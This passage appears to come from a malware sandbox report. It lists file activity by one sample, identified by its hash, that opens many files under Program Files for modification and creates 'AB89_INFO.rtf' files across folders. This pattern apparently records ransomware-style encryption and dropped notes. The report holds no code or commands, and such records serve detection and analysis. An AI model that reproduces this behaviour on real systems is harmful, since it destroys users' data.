Files\Java\jre7\lib\ext\jaccess.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Warsaw 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX9.x3d 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Casey 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Samarkand 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Brisbane 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\notification_helper.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Anchorage 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\platform.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\currency.data 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-1 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\cacerts 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_it.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Noronha 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\SearchConvertFrom.001 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Puerto_Rico 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Madrid 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\jp2launcher.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+3 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Chagos 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\COPYRIGHT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\London 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfxrt.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santiago 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\Journal.exe.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\LICENSE 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hebron 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Monaco 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Winnipeg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\lt.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\jfr\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tahiti 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Nicosia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Mail\wab.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\config.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh89 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\preloaded_data.pb 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tunis 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Chisinau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\RevokeUnblock.mp2v 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\RedoGet.mp2 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boa_Vista 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\management.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Windows Mail\WinMail.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program 